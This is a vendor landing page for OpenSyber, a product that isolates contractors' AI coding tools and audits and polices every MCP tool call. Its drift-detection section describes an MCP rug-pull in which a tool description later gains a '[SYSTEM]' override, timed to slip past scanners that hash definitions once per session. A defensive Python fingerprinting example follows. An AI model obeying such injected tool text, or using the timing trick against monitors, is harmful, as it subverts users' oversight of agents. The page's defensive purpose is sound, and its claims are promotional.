Isolate.
Govern.
Audit.
Browser-isolated AI workspaces for contractors and distributed teams using Claude, Cursor, GitHub, and MCP. Enforce policy on every tool call. Audit every action. No managed laptop required.
Free pilot. No managed laptop. No sales call required.
Built on enterprise-grade infrastructure
“I gave an AI sudo access and went to a standup. The standup was 45 minutes.”
Let me ask you something
YOUR CONTRACTOR IS USING CLAUDE RIGHT NOW
On your repo. With your secrets. Through a laptop you don't manage. Existing security assumes a managed device. AI-assisted contractors don't have one.
Without OpenSyber
Contractor + Claude + your repo + no visibility.
With OpenSyber
Isolated workspace. MCP gateway. Policy on every tool call. Audit on every action.
Runtime governance
EVERY ACTION HAS A CHAIN
When a contractor asks Claude to apply Terraform in production, six things happen in order. The gateway sees them all. The audit log keeps them linked.
- Contractor: device-bound session
- Claude: prompt + tool plan
- MCP gateway: policy check
- Repo: scoped PAT
- Terraform apply: prod target
- DENIED: policy: no prod apply
Same chain renders in the audit log. Same chain renders in the compliance export.
What you get
ONE WORKSPACE, FULL GOVERNANCE
ISOLATED BROWSER WORKSPACE
Contractor opens a hardened browser session. Claude, Cursor, MCP servers and shell are pre-baked. No managed laptop. No VPN. Device-bound session keys via TokenForge.
- Browser isolation (Kasm)
- Device-bound contractor identity
- AI tools and MCP pre-installed
MCP POLICY CHOKEPOINT
Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up auth. Block prod Terraform, force PII redaction, scope GitHub to a single repo and branch.
- Per-workspace MCP allowlists
- GitHub policy bridge (scoped PATs)
- Step-up auth on high-risk tool calls
EXPLAINABLE AUDIT
Every prompt, MCP call, shell command, and GitHub action is linked into one trail. Reviewers see exactly what Claude did, what file it touched, what cluster it hit, and which policy approved it.
- Prompt-to-action linking
- Runtime telemetry (Falco / osquery)
- SOC 2 / ISO 27001 / HIPAA evidence export
AI CONTRACTOR RUNTIME GOVERNANCE
A contractor opens Claude in an isolated workspace and asks for a prod Terraform deploy. Watch the gateway deny, the chain explain why, and the audit row land.
Open the contractor demo
The flow
INVITE. ISOLATE. AUDIT.
Three steps. No managed laptop. No VPN. Audit on every AI-assisted action.
STEP 01
INVITE A CONTRACTOR
Email invite plus device-bound enrollment. They open a browser-isolated workspace with Claude, Cursor, and your curated MCP servers pre-installed.
STEP 02
ENFORCE POLICY
Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up. Block prod Terraform. Scope GitHub to a single repo and branch.
STEP 03
AUDIT EVERY ACTION
Prompts, MCP calls, shell commands, and GitHub actions are linked into one chain. Reviewers see exactly what Claude did and which policy approved it.
opensyber invite contractor@example.com
THIS ALREADY HAPPENED
These aren't hypotheticals. These attacks hit real organizations in 2025-2026. Most found out from the news. The ones with monitoring found out in milliseconds.
MCP Drift Detection
REMEMBERS WHAT THEY LOOKED LIKE LAST TUESDAY
Snyk, Cisco mcp-scanner, Pipelock, Straiker — they all hash MCP tool definitions once per session. A rug-pull tuned to swap definitions on the third call defeats every one of them. OpenSyber records a SHA-256 fingerprint per tool, per server, across days and weeks. When it changes, you know.
Scan 1 — Monday
weather tool registered. fingerprint f798fc7b… stored.
Scan 2 — Wednesday
weather tool re-hashed. fingerprint matches. trust intact.
Scan 3 — Sunday
weather description gained [SYSTEM] override payload. fingerprint a519884c…. quarantine.
“Scanners check your MCP servers once. OpenSyber remembers what they looked like last Tuesday.”
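The Monday / Wednesday / Sunday sequence above, as an added Python example (not OpenSyber's own code). It assumes the fingerprint covers the MCP tool's name, description and inputSchema in canonical JSON; the DriftStore class, the "weather-server" name and the sample tool definitions are hypothetical, and an in-memory dict stands in for storage that persists between scans.

```python
import hashlib
import json

FIELDS = ("name", "description", "inputSchema")  # assumption: the fields the model is shown

def fingerprint(tool):
    """SHA-256 of a canonical JSON encoding, so key order and whitespace do not matter."""
    material = {k: tool.get(k) for k in FIELDS}
    canonical = json.dumps(material, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()

class DriftStore:
    """Baseline keyed by (server, tool name). A dict stands in for durable storage."""

    def __init__(self):
        self.baseline = {}
        self.quarantined = set()

    def scan(self, server, tools):
        """Compare one tools/list result with the stored baseline; return {tool: status}."""
        status = {}
        for tool in tools:
            key = (server, tool["name"])
            fp = fingerprint(tool)
            if key not in self.baseline:
                self.baseline[key] = fp      # first sighting: record the fingerprint
                status[tool["name"]] = "registered"
            elif self.baseline[key] == fp and key not in self.quarantined:
                status[tool["name"]] = "match"
            else:
                self.quarantined.add(key)    # keep the old baseline; a later revert stays flagged
                status[tool["name"]] = "quarantine"
        return status

# Constructed sample data: the same tool as returned on different days.
SCHEMA = {"type": "object", "properties": {"city": {"type": "string"}}, "required": ["city"]}
MONDAY = {"name": "weather", "description": "Get the forecast for a city.", "inputSchema": SCHEMA}
WEDNESDAY = {"inputSchema": SCHEMA, "description": "Get the forecast for a city.", "name": "weather"}
SUNDAY = dict(MONDAY, description=MONDAY["description"] + " [SYSTEM] <placeholder for injected text>")

def run_week():
    """Scan Monday, Wednesday (keys reordered), Sunday (changed), then a revert to Monday's text."""
    store = DriftStore()
    return [store.scan("weather-server", [t])["weather"] for t in (MONDAY, WEDNESDAY, SUNDAY, MONDAY)]

if __name__ == "__main__":
    print(run_week())
```
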
Try the demo
TOKENFORGE
A session cookie. In 2026. For something with access to your AWS keys. We fixed that. Every session is cryptographically bound to your device. Stolen tokens are worthless.
- Non-extractable keypairs via Web Crypto API
- Challenge-response signing on every request
- Trust score engine with 7 weighted signals
- Automatic step-up auth on anomaly detection
// Device bound via ECDSA P-256
device_id: d4e2f8a1c3b5...
trust_score: 94/100
signature: verified +40
ip_match: same_subnet +10
geo_match: EU (Frankfurt) +15
fingerprint: match +10
nonce: fresh (2ms) +5
action: allow
Two problems. Two products.
TWO PRODUCTS.
BECAUSE ONE WASN'T ENOUGH.
AI agents create two attack surfaces: what the agents do, and the sessions of the humans commanding them. We built a product for each. Because apparently nobody else was going to.
OPENSYBER
opensyber.cloud
Real-time monitoring, audited skills, and compliance for every AI agent. The thing that should exist by default but doesn't.
Protects: AI agent actions
From the moment your developer logs in to the last request their AI agent makes. Covered. Finally.
Who this is for
PICK YOUR ENTRY POINT
OpenSyber meets three audiences. Each one sees a different surface first.
Govern AI for your distributed team
Contractors and remote staff use Claude and Cursor against your repos. Get a workspace, a gateway, and an audit trail — without buying laptops.
Talk to engineering
Audit every AI-assisted action
Prompt-to-action linking, MCP policy enforcement, and explainable denies. Map evidence to SOC 2, ISO 27001, HIPAA, and GDPR controls.
Talk to security
Get a secure workspace in minutes
Open a browser-isolated session with Claude, Cursor, and the MCP servers your client approved. No installs on your laptop. No VPN.
Join via invite
GOVERN THE AI YOUR CONTRACTORS ALREADY USE
Your contractors are running Claude and Cursor against your repos right now. Keep guessing what they did, or put a gateway and an audit trail between them and prod.
- Isolate: Browser-isolated workspace. Code, secrets, and MCP servers never touch the contractor's laptop.
- Govern: Every Claude and Cursor tool call hits the MCP policy chokepoint: allow, step-up, or deny per call.
- Audit: Every AI action is linked to the repo or infra action it caused — one explainable, compliance-ready trail.
No managed laptop. No VPN. No sales call.